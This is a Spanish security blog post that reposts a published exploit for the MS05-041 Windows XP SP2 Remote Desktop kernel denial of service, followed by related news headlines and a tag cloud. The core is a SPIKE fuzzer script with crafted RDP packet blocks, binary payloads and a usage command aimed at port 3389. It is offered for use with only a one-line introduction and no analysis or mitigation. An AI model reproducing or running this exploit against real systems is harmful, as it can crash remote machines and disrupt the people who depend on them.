Exploit para Microsoft Windows Remote Desktop Protocol DoS (MS05-041)


Exploit publicado en frsirt.com, dicho exploit hace referencia al MS05-041





Advisory : FrSIRT/ADV-2005-1113
Rated as : Moderate Risk
Port : 3389

// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Microsoft Windows XP SP2
//
// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.

s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D
73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");

s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");

s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3");

Fuente
frsirt.com



Otras noticias de interés:

Publicada versión 1.0.5 de Mozilla Firefox
El día 12 del presente mes se ha publicado una nueva versión del navegador Mozilla Firefox (concretamente la 1.0.5)....
Inseguridad en los servidores DNS de Microsoft
Se ha publicado una vulnerabilidad que afecta al servidor de DNS de Microsoft, en sus configuraciones por defecto, que permite que cualquier usuario modifique los registros DNS de la organización, sin necesidad de proporcionar ninguna credenci...
Services Pack para Internet Explorer 6.0 y Windows XP
Microsoft ha publicado sendos Services Pack para la versión 6.0 de su navegador web y para el sistema operativo Windows XP. Se trata de dos actualizaciones muy recomendables para los usuarios de estos productos. A pesar de no ...
Veinte años de virus
Hace ahora veinte años, el 10 de Noviembre de 1983, que Fred Cohen demostró empíricamente lo que todos temían e intuían: efectivamente, como muchos habían estudiado teóricamente, se podía crear código que atacara a otros programas modificán...
Extensiones de Google mejoran la seguridad de Java
Tomando prestada una técnica de Eiffel, Google está añadiendo la funcionalidad Design-By-Contract a Java....
La decadencia de los gusanos de infección masiva
Larry Seltzer publica en eWeek una reflexión sobre el escaso impacto actual de los gusanos de red. Si en otros tiempos fueron capaces de afectar a millones de usuarios de Windows (aunque también han existido para servidores PHP, por ejemplo), de...
Falso correo de Microsoft distribuye backdoor
PandaLabs ha detectado el envió de mensajes de correo electrónico que, afirmando provenir de la compañía Microsoft, tratan de instalar en el ordenador al backdoor Bandok.BO. El asunto de estos correos es: Boletin de seguridad de Microsoft MS07-0...
Publicada lista con los 25 errores de código más peligrosos
La mayoría de las vulnerabilidades que los hackers aprovechan para atacar sitios Web y servidores corporativos son generalmente el resultado de errores de programación comunes y bien conocidos. Para paliar este problema, un grupo de compañías ha ...
AOL podría compatibilizar su servicio de mensajería con el protocolo XMPP/Jabber
Algunos gigantes están dando pasos interesantes con los estándares abiertos. Por un lado, muchos usuarios de Yahoo podrán usar sus identificadores a partir del 30 de Enero como identificadores en servicios web que soporten indentificación mediant...
Dos algoritmos avanzan en el reconocimiento facial por parte de los ordenadores
Uno reconoce un rostro a partir de una sola imagen y el otro identifica expresiones en tiempo real...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • desktop
  • dos
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • protocol
  • remote
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra